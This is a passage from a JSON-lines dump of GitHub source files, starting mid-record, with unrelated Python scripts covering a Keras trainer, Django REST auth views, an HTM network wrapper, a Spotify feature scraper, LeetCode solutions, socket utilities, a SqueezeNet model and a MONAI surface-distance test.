datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tb_callback = TensorBoard(log_dir=tb_log,\n histogram_freq=1,\n write_graph=True,\n write_images=True)\n tb_callback.set_model(self.model)\n\n if os.path.isfile(MODEL_WEIGHT_FILENAME):\n self.model.load_weights(MODEL_WEIGHT_FILENAME)\n\n history = self.model.fit_generator(\n self.train_data_gen,\n steps_per_epoch=self.steps_per_epoch,\n epochs=self.epochs,\n validation_data=self.validation_gen,\n validation_steps=self.validation_steps,\n callbacks=[tb_callback],\n )\n self.model.save(MODEL_WEIGHT_FILENAME)\n print('model weights saved!')\n return history\n\n\n\n","repo_name":"nordic96/Christopher_Image_Classifier","sub_path":"trainer/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3703262451","text":"from rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.authtoken.views import ObtainAuthToken\r\nfrom rest_framework.authtoken.models import Token\r\nfrom rest_framework import status\r\nfrom account.api.serializers import RegistrationSerializer\r\nfrom datetime import datetime\r\n\r\n# Returns the token if valid email and password is provided\r\nclass Login(ObtainAuthToken):\r\n\r\n def post(self, request, *args, **kwargs):\r\n serializer = self.serializer_class(data=request.data, context={'request': request})\r\n serializer.is_valid(raise_exception=True)\r\n account = serializer.validated_data['user'] # Get the user\r\n Token.objects.get(user=account).delete() # Delete the old token\r\n token = Token.objects.create(user=account) # Create a new token\r\n data = {\r\n 'token': token.key,\r\n 'user_id': account.pk,\r\n 'email': account.email\r\n }\r\n account.last_login = datetime.now() # Update last_login\r\n account.save()\r\n return Response(data)\r\n\r\n# Requires email, password, password2\r\nclass Register(APIView):\r\n\r\n def post(self, request):\r\n serializer = RegistrationSerializer(data=request.data)\r\n data = {} # This is what we'll return to the view\r\n if serializer.is_valid():\r\n account = serializer.save()\r\n data['email'] = account.email\r\n data['user_id'] = account.pk\r\n token = Token.objects.get(user=account)\r\n data['token'] = token.key\r\n else:\r\n # If the serializer throws any errors, return the error\r\n data = serializer.errors\r\n return Response(data=data, status=status.HTTP_201_CREATED)\r\n","repo_name":"maxitron93/quora_clone","sub_path":"account/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15916263264","text":"import os\nfrom htm.bindings.engine_internal import Network as BaseNetwork\n\nfrom pandaBaker.pandaBaker import PandaBaker\nfrom pandaBaker.dataStructs import cDataStream\n\nBAKE_DATABASE_FILE_PATH = os.path.join(os.getcwd(), 'bakedDatabase', 'pandaVis.db')\n\nclass Network(BaseNetwork):\n def __init__(self):\n self.firstRun = True\n self.bakePandaData = True\n self.pandaBaker = PandaBaker(BAKE_DATABASE_FILE_PATH)\n self.iteration = 0\n\n self.updateDataStreams = None # callback for user method\n self.verbose = False\n\n super().__init__()\n\n def run(self, n):\n if not self.bakePandaData:\n super().run(n) # if not baking, just run as normal\n self.iteration += n\n return\n if self.verbose == True:\n print(\"Iteration \"+str(self.iteration)+\" running \"+str(n)+\"x\")\n for i in range(n):\n super().run(1)\n if self.firstRun:\n self.FirstRun()\n\n if self.updateDataStreams is not None: # call callback to user app to fill in data to dashStreams\n self.updateDataStreams()\n\n self.pandaBaker.StoreIteration(self, self.iteration)\n\n self.iteration += 1\n self.pandaBaker.CommitBatch() # called too often? performance issue?\n\n def FirstRun(self):\n print(\"first run\")\n self.firstRun = False\n\n structure = {}\n regions = {}\n links = {}\n\n structure[\"regions\"] = regions\n structure[\"links\"] = links\n\n regionTypes = \"\"\n for region in self.getRegions():\n regionTypes += \",\" + str(region[1].getType())\n regions[region[0]] = [region[1].getType(), region[1]]\n\n print(\"There are these types of regions in the network:\"+regionTypes)\n i = 0\n for l in self.getLinks():\n links[i] = [l.getSrcRegionName(), l.getSrcOutputName(), l.getDestRegionName(), l.getDestInputName()]\n\n i = i+1\n\n self.pandaBaker.PrepareDatabase(structure)\n\n def UpdateDataStream(self, name, value):\n if name not in self.pandaBaker.dataStreams:\n self.pandaBaker.CreateDataStream(name, cDataStream())\n\n self.pandaBaker.dataStreams[name].value = value # assign value\n\n\n\n","repo_name":"htm-community/HTMpandaVis","sub_path":"pandaBaker/pandaNetwork.py","file_name":"pandaNetwork.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"23332980575","text":"# Clase creada para extraer datos de las canciones \n\nfrom api_spotify import configuration_API_Spotify\nimport pandas as pd\nimport numpy as np\nimport os \nimport time\nimport spotipy\nimport configparser\nfrom spotipy.oauth2 import SpotifyClientCredentials\n\n\n\ndef get_PATH_URL():\n carpeta_padre = os.path.dirname(os.getcwd())\n return carpeta_padre\n\n\n\ndef __init_songs__():\n \n # Abrir archivo dataframe con información de los albumes\n PATH_URL = os.path.join(get_PATH_URL(), 'Data', 'dataframe_albums.pkl')\n df_album = pd.read_pickle(PATH_URL)\n\n \n array_songs = []\n ruta_config = os.path.join(get_PATH_URL(), 'Backend/Tokens', 'tokens.ini')\n\n if not os.path.exists(ruta_config):\n raise FileNotFoundError(f\"El archivo config.ini no se encuentra en la ruta: {ruta_config}\")\n \n # Conectar la API de Spotify para extraer audiofeatures\n sp = configuration_API_Spotify(ruta_config)\n\n \n # Crear DataFrame para las canciones\n\n songs_id = [] \n # id,duration_ms, danceability, energy, loudness, valence\n audio_features_df = []\n cont = 1\n cont_album = 0\n \n \n for id_album in df_album['id']:\n for song in sp.album_tracks(id_album)['items']:\n try:\n audio_features = sp.audio_features(song['uri'])[0]\n songs_id.append(audio_features['id'])\n audio_features_df.append([song['name'],audio_features['duration_ms'],audio_features['danceability'],audio_features['energy'],audio_features['loudness'],audio_features['valence']])\n \n except:\n # Guardar temp\n df_songs = pd.DataFrame(columns = ['id','duration_ms','danceability','energy','loudness','valence'],data = audio_features_df,index = songs_id)\n df_songs.to_pickle(os.path.join(get_PATH_URL(), 'Data', 'dataframe_songs.pkl'))\n\n time.sleep(30)\n pass\n\n cont_album += 1\n\n df_songs = pd.DataFrame(columns = ['id','duration_ms','danceability','energy','loudness','valence'],data = audio_features_df,index = songs_id)\n \n print(df_songs) \n \n df_songs.to_pickle(os.path.join(get_PATH_URL(), 'Data', 'dataframe_songs.pkl'))\n\n# Open df songs\nPATH_URL = os.path.join(get_PATH_URL(), 'Data', 'dataframe_albums.pkl')\ndf_album = pd.read_pickle(PATH_URL)\n\nprint(df_album['tracks'].iloc[0])\n\n\n# Nombre de artista y canción\n # Nombre del artista y canción -> Donde la letra no este en Spotify\n\n","repo_name":"MateoG404/IA_SpotifyLyrics","sub_path":"Backend/songs.py","file_name":"songs.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2071616113","text":"#Method 1, O(n), 32ms DECREASING Mono Queue\n#Similar to LC84 Largest Area in Histogram, which store increasing bars in a stack, then calculate area\n#This solution uses stack to save decreasing (incl. equal) bars, and then calculate area/water fill.\nclass Solution(object):\n def trap(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n \n if len(height)<3: \n return 0\n \n #use stack to store the indices with decreasing wall heights (including equal)\n stack, water = [], 0\n \n for i, h in enumerate(height):\n while stack and h > height[stack[-1]]:\n bottom = stack.pop()\n if stack:\n level = min(h, height[stack[-1]]) - height[bottom]\n water += level *(i - stack[-1] -1)\n stack.append(i)\n return water\n\n\n#Method 2, O(n), 28ms\n#Start from two ends, the water level of each location depends on min(leftMax, rightMax)\nclass Solution(object):\n def trap(self, height):\n \n if len(height)<3: \n return 0\n \n l, r = 0, len(height)-1\n leftMax = height[l]\n rightMax = height[r]\n water = 0\n while l 0:\n result += 1\n\n file.close()\n return result\n\nif __name__ == '__main__':\n #print(sys.argv)\n if len(sys.argv) < 2:\n print(\"More argument\")\n input_file_name = str(sys.argv[1])\n print(CountMissingDataRows(input_file_name))","repo_name":"vohieu00/PreProcessing","sub_path":"CountMissingDataRows.py","file_name":"CountMissingDataRows.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38305356534","text":"import socket\n\ndef main():\n print('\\n-----START-----')\n\n send_msg = \"356a192b7913b04c54574d18c28d46e6395428a1\"\n\n sock = socket.socket()\n try:\n sock.connect((\"127.0.0.1\", 4000))\n except ConnectionRefusedError:\n raise ConnectionRefusedError\n\n sock.send(send_msg.encode())\n print(\"\\nSEND {}\".format(send_msg))\n\n receive_msg = sock.recv(1024).decode()\n print(\"\\nRECEIVE {}\".format(receive_msg))\n\n sock.close()\n\nif __name__ == '__main__':\n main()","repo_name":"childhoodisend/astra","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14491518213","text":"import re\n\nips = [re.findall(r\"\\[?[a-z]+\\]?\", x) for x in open(\"input.txt\").readlines()]\n\ndef hasMatchingBAB(ip, aba):\n babSource = \"\".join([i for i in ip if \"[\" in i])\n for a in aba:\n if a[1]+a[0]+a[1] in babSource:\n return True\n return False\n\ndef extractABA(ip):\n aba = set()\n for i in ip:\n if \"[\" in i:\n continue\n\n for a,b,c in zip(i, i[1:], i[2:]):\n if a == c and a != b:\n aba.add(a+b+c)\n\n return aba\n\nno = 0\nfor ip in ips:\n aba = extractABA(ip)\n if hasMatchingBAB(ip, aba):\n no += 1\n\nprint(no)","repo_name":"pepperbob/adventofcode","sub_path":"2016/no7/solution-2.py","file_name":"solution-2.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70663684648","text":"import socket\nfrom urllib.parse import urlparse\nimport re\nimport sys\nimport ssl\n# host = 'me.utm.md'\nprint(\"port %s\" % (sys.argv[1]))\nprint(\"host %s\" % (sys.argv[2]))\nprint(\"link %s\" % (sys.argv[3]))\nprint(\"filename %s\" % (sys.argv[4]))\nport = int((sys.argv[1]))\nhost = (sys.argv[2])\nlink = (sys.argv[3])\nfilename = (sys.argv[4])\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nif port == 443:\n context = ssl.create_default_context()\n sock = context.wrap_socket(sock, server_hostname=host)\nserver_address = (host, port)\nsock.connect(server_address)\nurl = urlparse(link)\nrequest = \"GET {} HTTP/1.0\\r\\nHost: {}\\r\\n\\r\\n\".format(url.path, host)\nsock.send(request.encode())\nresponse = sock.recv(1024)\nheaders, image_data = response.split(b\"\\r\\n\\r\\n\", 1)\n\ncontent_length_match = re.search(r'content-length:\\s*(\\d+)', headers.decode().lower())\ncontent_length = int(content_length_match.group(1))\n\nwhile len(image_data) < content_length:\n image_data += sock.recv(1024)\n\nwith open(\"images/\"+filename, \"wb\") as f:\n f.write(image_data)\n f.close()\nsock.close()","repo_name":"danielcode2020/programare_retea","sub_path":"images/py/amain.py","file_name":"amain.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38902213690","text":"# -*- coding: utf-8 -*-\n# @Author : uni_kevin(可乐)\nimport json\n\nimport mod.server.extraServerApi as serverApi\nimport apolloCommon.commonNetgameApi as commonNetgameApi\nimport serverhttp\n\nServerSystem = serverApi.GetServerSystemCls()\nEngineNamespace = serverApi.GetEngineNamespace()\nEngineSystemName = serverApi.GetEngineSystemName()\n\n# noinspection SqlResolve\nclass HziAuthApi(ServerSystem):\n\n def __init__(self, namespace, systemName):\n ServerSystem.__init__(self, namespace, systemName)\n config = commonNetgameApi.GetModJsonConfig('hziAuthScript')\n self.apiHost = config['database_host']\n\n @staticmethod\n def IsPlayerBindPhone(uid):\n system = serverApi.GetSystem('HziAuth', 'HziAuthDev')\n if uid in system.playerAuthData:\n return system.playerAuthData[uid]['code'] != 0\n else:\n return False\n\n def IsPlayerBindPhoneNewest(self, uid, cb):\n url = self.apiHost + '/check_player'\n header = {'Content-Type': 'application/json'}\n data = json.dumps({'uid': uid})\n def callback(code, result, header):\n if code == 200:\n result = json.loads(result, encoding='utf-8')\n cb(result['code'] != 0)\n else:\n cb(None)\n serverhttp.HttpPool().Request('POST', url, header, data, callback)\n\n @staticmethod\n def GetPlayerBanData(uid):\n system = serverApi.GetSystem('HziAuth', 'HziAuthDev')\n if uid in system.playerAuthData:\n return system.playerAuthData[uid]['banData']\n else:\n return False\n\n def GetPlayerBanDataNewest(self, uid, cb):\n url = self.apiHost + '/check_player'\n header = {'Content-Type': 'application/json'}\n data = json.dumps({'uid': uid})\n def callback(code, result, header):\n if code == 200:\n result = json.loads(result, encoding='utf-8')\n if 'ban_data' in result:\n cb(dict(json.loads(result['ban_data'].encode('utf-8'))))\n else:\n cb({})\n else:\n cb(False)\n serverhttp.HttpPool().Request('POST', url, header, data, callback)\n\n def BanPlayer(self, uid, level, cb):\n url = self.apiHost + '/ban'\n header = {'Content-Type': 'application/json'}\n data = json.dumps({'uid': uid, 'level': level})\n def callback(code, result, header):\n if code == 200:\n result = json.loads(result, encoding='utf-8')\n cb(result)\n else:\n cb(False)\n serverhttp.HttpPool().Request('POST', url, header, data, callback)\n\n","repo_name":"NullYu/icegame-dev","sub_path":"hziAuth/developer_mods/hziAuthDev/hziAuthScript/hziAuthApi.py","file_name":"hziAuthApi.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1459600655","text":"''' Write a python program to create a dictionary of\n hindi words with values as their english translation\n provide user with an option to look it up '''\n \nmyDict = {\n \"Pankha\": \"Fan\",\n \"Dabba\": \"Box\",\n \"Vastu\": \"Item\",\n \"Kitab\": \"Book\",\n \"Insaan\": \"Human\",\n \"Ladka\": \"Boy\"\n}\nprint(\"The Options are:\\n \", myDict.keys())\na = input(\"Enter the Hindi Word which you want to translate: \")\nprint(\"The meaning of your entered word is: \", myDict.get(a))","repo_name":"Deepesh-Patel/Python-Programs","sub_path":"Dictionary & Sets/03_hindi-english_translation.py","file_name":"03_hindi-english_translation.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74162670888","text":"\"\"\"\n创建进程调用其他程序\n\nVersion: 0.1\nAuthor: 骆昊\nDate: 2018-03-20\n\"\"\"\n\nimport subprocess\nimport sys\n\ndef main():\n # 通过sys.argv获取命令行参数\n if len(sys.argv) > 1:\n # 第一个命令行参数是程序本身所以从第二个开始取\n for index in range(1, len(sys.argv)):\n try:\n # 通过subprocess模块的call函数启动子进程\n status = subprocess.call(sys.argv[index])\n except FileNotFoundError:\n print('不能执行%s命令' % sys.argv[index])\n else:\n print('请使用命令行参数指定要执行的进程')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jackfrued/Python-100-Days","sub_path":"Day01-15/code/Day13/multiprocess3.py","file_name":"multiprocess3.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"zh","doc_type":"code","stars":142367,"dataset":"github-code","pt":"53"} +{"seq_id":"70368226728","text":"\"\"\"\r\nYou are given an array arr of n elements. In one operation you can pick two indices i and j, such that arr[i] >= arr[j] and replace the value of arr[i] with (arr[i] - arr[j]). You have to minimize the values of the array after performing any number of such operations.\r\n\r\nExample 1:\r\n\r\nInput:\r\nn = 3\r\narr = {3,2,4}\r\nOutput:\r\n1\r\nExplanation:\r\n1st Operation : We can pick 4 & 3, subtract 4-3 => {3,2,1}\r\n2nd Opeartion : We can pick 3 & 2, subtarct 3-2 => {1,2,1}\r\n3rd Operation : We can pick 1 & 2, subtract 2-1 => {1,1,1}\r\n4th Opeartion : We can pick 1 & 1, subtract 1-1 => {1,0,1}\r\n5th Operation : We can pick 1 & 1, subtract 1-1 => {0,0,1}\r\nAfter this no operation can be performned, so maximum no is left in the array is 1, so the ans is 1.\r\nExample 2:\r\n\r\nInput:\r\nn = 2\r\narr = {2,4}\r\nOutput:\r\n2\r\nExplanation:\r\n1st Operation : We can pick 4 & 2, subtract 4-2 => {2,2}\r\n2nd Operation : We can pick 2 & 2, subtract 2-2 => {0,2}\r\nAfter this no operation can be performned, so maximum no is left in the array is 2, so the ans is 2.\r\n\"\"\"\r\n\r\n# My solution: -\r\nclass Solution:\r\n def minimumNumber(self, n, arr):\r\n while max(arr) != min(arr):\r\n max_index = arr.index(max(arr))\r\n min_index = arr.index(min(arr))\r\n arr[max_index] = arr[max_index] - arr[min_index]\r\n return max(arr)\r\n\r\n# Testing\r\nsol = Solution()\r\n\r\n# Test Case 1\r\nn1 = 3\r\narr1 = [3, 2, 4]\r\nprint(sol.minimumNumber(n1, arr1)) # Output: 1\r\n\r\n# Test Case 2\r\nn2 = 2\r\narr2 = [2, 4]\r\nprint(sol.minimumNumber(n2, arr2)) # Output: 2\r\n\r\n# Another interesting solution I found: -\r\n# This solution also reduces the time complexity ;)\r\n\r\nfrom math import gcd\r\n\r\nclass Solution1:\r\n def minimumNumber1(self, n, arr):\r\n result = arr[0]\r\n for i in range(1, n):\r\n result = gcd(result, arr[i])\r\n return result\r\n\r\n# Create an instance of the Solution class\r\nsolu = Solution1()\r\n\r\n# Test Case 1\r\nn3 = 3\r\narr3 = [3, 2, 4]\r\nprint(solu.minimumNumber1(n3, arr3)) # Output: 1\r\n\r\n# Test Case 2\r\nn4 = 2\r\narr4 = [2, 4]\r\nprint(solu.minimumNumber1(n4, arr4)) # Output: 2\r\n\r\n","repo_name":"Siddharth1047/code-till-job","sub_path":"Day-12.py","file_name":"Day-12.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35066838627","text":"# Author: Omkar Dixit\n# Email: omedxt@gmail.com\n\n# Link: https://leetcode.com/problems/find-median-from-data-stream/\n\n# Time Complexity: O(logn)\n\nimport heapq\n\nclass MedianFinder(object):\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.leftSide = [] # Max Heap\n self.rightSide = [] # Min Heap\n \n def addNum(self, num):\n \"\"\"\n :type num: int\n :rtype: None\n \"\"\"\n heapq.heappush(self.leftSide, -num)\n heapq.heappush(self.rightSide, -heapq.heappop(self.leftSide))\n if len(self.leftSide) < len(self.rightSide):\n heapq.heappush(self.leftSide, -heapq.heappop(self.rightSide))\n\n def findMedian(self):\n \"\"\"\n :rtype: float\n \"\"\"\n if len(self.leftSide) == len(self.rightSide):\n return (-self.leftSide[0] + self.rightSide[0]) / 2.0\n else:\n return -self.leftSide[0]\n \n\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()","repo_name":"dixitomkar1809/Coding-Python","sub_path":"LeetCode/medianOfDataStream.py","file_name":"medianOfDataStream.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20747274573","text":"import os\nfrom pathlib import Path\nimport sys\n\nclass Installer:\n\n def __init__(self):\n self.to_install = []\n self.userdir = None\n self.filesystems = []\n\nexecutable = Path(sys.executable)\nenvdir = executable.parent.parent\nmambadir = envdir.parent.parent\n\n\n","repo_name":"scottcanoe/sandbox","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15668156453","text":"# _*_ coding:utf-8 _*_\nfrom pymysql import connect\nimport yaml\nfrom loguru import logger\nimport os\n\n\nclass DB(object):\n\n def __init__(self):\n \"\"\"连接数据库\"\"\"\n path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'test_project', 'data', 'datas.yaml')\n with (open(path, 'r', encoding='utf8')) as f:\n self.data = yaml.load(f, Loader=yaml.FullLoader)\n logger.info(self.data)\n logger.info('连接数据库.......')\n self.conn = connect(host=self.data['database']['host'], user=self.data['database']['username'],\n password=self.data['database']['password'], db=self.data['database']['name'])\n self.cursor = self.conn.cursor()\n\n def run_api_uesr(self):\n self.clear(self.data['database1'])\n logger.info('正在插入api_user表数据........')\n global sql\n for i in range(len(self.data['data1'])):\n tabel_name = self.data['database1']\n id = self.data['data1'][i]['id']\n username = self.data['data1'][i]['username']\n email = self.data['data1'][i]['email']\n groups = self.data['data1'][i]['groups']\n sql = f\"\"\"INSERT INTO {tabel_name}(id,username, email, `groups`) VALUES ({id}, '{username}', '{email}', '{groups}')\"\"\"\n self.insert(sql)\n\n def run_api_group(self):\n self.clear(self.data['database2'])\n logger.info('正在插入api_group表数据........')\n global sql\n for i in range(len(self.data['data1'])):\n tabel_name = self.data['database2']\n id = self.data['data2'][i]['id']\n name = self.data['data2'][i]['name']\n sql = f\"\"\"INSERT INTO {tabel_name}(id,name) VALUES ({id}, '{name}')\"\"\"\n self.insert(sql)\n\n def clear(self, table_name):\n \"\"\"清除表中数据\"\"\"\n clear_sql = 'truncate ' + table_name + ';'\n self.cursor.execute('set foreign_key_checks=0;')\n self.cursor.execute(clear_sql)\n self.conn.commit()\n\n def insert(self, sql):\n \"\"\"插入数据\"\"\"\n try:\n # 执行sql语句\n self.cursor.execute(sql)\n # 提交到数据库执行\n self.conn.commit()\n except:\n # 如果发生错误则回滚\n self.conn.rollback()\n\n def close(self):\n \"\"\"关闭数据库连接\"\"\"\n logger.info('关闭数据库.......')\n self.conn.close()\n\n def init_data(self):\n logger.info('正在初始化数据.........')\n self.run_api_group()\n self.run_api_uesr()\n self.close()\n\n\nif __name__ == '__main__':\n db = DB()\n db.init_data()\n","repo_name":"liuchangfu/django_restful","sub_path":"api/test_project/mysql_action.py","file_name":"mysql_action.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41670320525","text":"import argparse\nimport sys\nfrom Bio import SeqIO\nimport numpy as np\n\ndef length_stat(path, type):\n length = []\n if type == 'fastq':\n errors = [] # expected wrong bases in each read\n with open(path) as f:\n records = SeqIO.parse(f, type)\n for record in records:\n length.append(len(record.seq))\n if type == 'fastq':\n q = np.array(record.letter_annotations[\"phred_quality\"])\n pe = 10**(-0.1 * q)\n errors.append(length[-1] * np.mean(pe))\n\n length = np.array(length)\n count = len(length)\n max_len = np.max(length)\n min_len = np.min(length)\n mean = np.mean(length)\n median = np.median(length)\n total = np.sum(length)\n if type == 'fastq':\n error_base = np.sum(errors)\n print(\"There are {} reads\".format(count))\n print(\"In total, there are {} bases\".format(total))\n print(\"The mean of reads is {}\".format(mean))\n print(\"The median of reads is {}\".format(median))\n print(\"longest length is {} and the shortest length is {}\".format(max_len, min_len))\n if type == 'fastq':\n print('Total errors is {}'.format(error_base))\n print('Estimated error rates is {}'.format(error_base/total))\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", help=\"path of input file\", type=str)\n parser.add_argument('--type', type=str, default='fasta', help='type of input \"fasta\" or \"fastq\"')\n\n try:\n args = parser.parse_args()\n\n except:\n parser.print_help()\n sys.exit(1)\n\n length_stat(args.input, args.type)\n\n\n","repo_name":"Strideradu/SeqAnaScript","sub_path":"SeqLengthStat.py","file_name":"SeqLengthStat.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5375643582","text":"import tensorflow as tf\nimport numpy as np\nimport sys\nimport skimage\nimport skimage.io\nimport skimage.transform\n\n# Parameters\nlearning_rate = 0.01\ntraining_epochs = 25\nbatch_size = 100\ndisplay_step = 1\n\n\nclass SqueezeNet(object):\n def __init__(self, nb_classes=2, is_training=True):\n # conv1\n self.X_batch = tf.placeholder(tf.float32,shape=[None,224,224,3])\n self.Y_batch = tf.placeholder(tf.float32,shape=[None, 2])\n\n net = tf.layers.conv2d(self.X_batch, 96, [7, 7], strides=[2, 2],\n padding=\"SAME\", activation=tf.nn.relu,\n name=\"conv1\")\n # maxpool1\n net = tf.layers.max_pooling2d(net, [3, 3], strides=[2, 2],\n name=\"maxpool1\")\n # fire2\n net = self._fire(net, 16, 64, \"fire2\")\n # fire3\n net = self._fire(net, 16, 64, \"fire3\")\n # fire4\n net = self._fire(net, 32, 128, \"fire4\")\n # maxpool4\n net = tf.layers.max_pooling2d(net, [3, 3], strides=[2, 2],\n name=\"maxpool4\")\n # fire5\n net = self._fire(net, 32, 128, \"fire5\")\n # fire6\n net = self._fire(net, 48, 192, \"fire6\")\n # fire7\n net = self._fire(net, 48, 192, \"fire7\")\n # fire8\n net = self._fire(net, 64, 256, \"fire8\")\n # maxpool8\n net = tf.layers.max_pooling2d(net, [3, 3], strides=[2, 2],\n name=\"maxpool8\")\n # fire9\n net = self._fire(net, 64, 256, \"fire9\")\n # dropout\n net = tf.layers.dropout(net, 0.5, training=is_training)\n # conv10\n # CURRENTLY 2 CLASS\n net = tf.layers.conv2d(net, 2, [1, 1], strides=[1, 1],\n padding=\"SAME\", activation=tf.nn.relu,\n name=\"conv10\")\n # avgpool10\n net = tf.layers.average_pooling2d(net, [13, 13], strides=[1, 1],\n name=\"avgpool10\")\n # squeeze the axis\n net = tf.squeeze(net, axis=[1, 2])\n\n self.logits = net\n self.prediction = tf.nn.softmax(net)\n\n self.losses = tf.losses.softmax_cross_entropy(onehot_labels=self.Y_batch,logits=self.logits)\n self.train = tf.train.GradientDescentOptimizer(0.1).minimize(self.losses)\n\n\n def _fire(self, inputs, squeeze_depth, expand_depth, scope):\n with tf.variable_scope(scope):\n squeeze = tf.layers.conv2d(inputs, squeeze_depth, [1, 1],\n strides=[1, 1], padding=\"SAME\",\n activation=tf.nn.relu, name=\"squeeze\")\n # squeeze\n expand_1x1 = tf.layers.conv2d(squeeze, expand_depth, [1, 1],\n strides=[1, 1], padding=\"SAME\",\n activation=tf.nn.relu, name=\"expand_1x1\")\n expand_3x3 = tf.layers.conv2d(squeeze, expand_depth, [3, 3],\n strides=[1, 1], padding=\"SAME\",\n activation=tf.nn.relu, name=\"expand_3x3\")\n return tf.concat([expand_1x1, expand_3x3], axis=3)\n\n\n\ndef load_image(path):\n # load image\n img = skimage.io.imread(path)\n img = img / 255.0\n # assert (0 <= img).all() and (img <= 1.0).all()\n # print \"Original Image Shape: \", img.shape\n # we crop image from center\n short_edge = min(img.shape[:2])\n yy = int((img.shape[0] - short_edge) / 2)\n xx = int((img.shape[1] - short_edge) / 2)\n crop_img = img[yy: yy + short_edge, xx: xx + short_edge]\n # resize to 224, 224\n resized_img = skimage.transform.resize(crop_img, (224, 224))\n return resized_img\n\n\nif __name__ == \"__main__\":\n path = sys.path[0]\n img1 = load_image(path+\"/dog.jpg\")*255.0\n img2 = load_image(path+\"/cat.jpg\")*255.0\n batch1 = img1.reshape((1, 224, 224, 3))\n batch2 = img2.reshape((1, 224, 224, 3))\n x = np.concatenate((batch1, batch2), 0)\n y = np.array([[1, 0],[0, 1]], dtype=np.int64)\n with tf.Graph().as_default():\n with tf.Session() as sess:\n SqueezeNet = SqueezeNet(x)\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n _, loss = sess.run([SqueezeNet.train, SqueezeNet.losses], feed_dict={SqueezeNet.X_batch: x, SqueezeNet.Y_batch: y})\n\n saver.save(sess, \"saved_model/model-32\")\n tf.summary.FileWriter(\"saved_model\", sess.graph)\n print(loss)\n","repo_name":"AprilYoungs/Computer-Vision","sub_path":"networks/SqueezeNet/SqueezeNet_Image.py","file_name":"SqueezeNet_Image.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8959651573","text":"import unittest\nfrom typing import Tuple\n\nimport numpy as np\nfrom parameterized import parameterized\n\nfrom monai.metrics import compute_average_surface_distance\n\n\ndef create_spherical_seg_3d(\n radius: float = 20.0,\n centre: Tuple[int, int, int] = (49, 49, 49),\n labelfield_value: int = 1,\n background_value: int = 0,\n im_shape: Tuple[int, int, int] = (99, 99, 99),\n) -> np.ndarray:\n \"\"\"\n Return a 3D image with a sphere inside. Voxel values will be\n `labelfield_value` inside the sphere, and `background_value` elsewhere.\n\n Args:\n radius: radius of sphere (in terms of number of voxels, can be partial)\n centre: location of sphere centre.\n labelfield_value: index of labelfield.\n background_value: index of background.\n im_shape: shape of image to create\n\n See also:\n :py:meth:`~create_test_image_3d`\n \"\"\"\n # Create image\n image = np.zeros(im_shape, dtype=np.int32)\n spy, spx, spz = np.ogrid[\n -centre[0] : im_shape[0] - centre[0], -centre[1] : im_shape[1] - centre[1], -centre[2] : im_shape[2] - centre[2]\n ]\n circle = (spx * spx + spy * spy + spz * spz) <= radius * radius\n\n image[circle] = labelfield_value\n image[~circle] = background_value\n return image\n\n\nTEST_CASES = [\n [\n [create_spherical_seg_3d(), create_spherical_seg_3d(), 1],\n [0, 0],\n ],\n [\n [\n create_spherical_seg_3d(radius=20, centre=(20, 20, 20)),\n create_spherical_seg_3d(radius=20, centre=(19, 19, 19)),\n 1,\n \"taxicab\",\n ],\n [1.0380029806259314, 1.0380029806259314],\n ],\n [\n [\n create_spherical_seg_3d(radius=33, labelfield_value=2, centre=(19, 33, 22)),\n create_spherical_seg_3d(radius=33, labelfield_value=2, centre=(20, 33, 22)),\n 2,\n ],\n [0.35021200688332677, 0.3483278807706289],\n ],\n 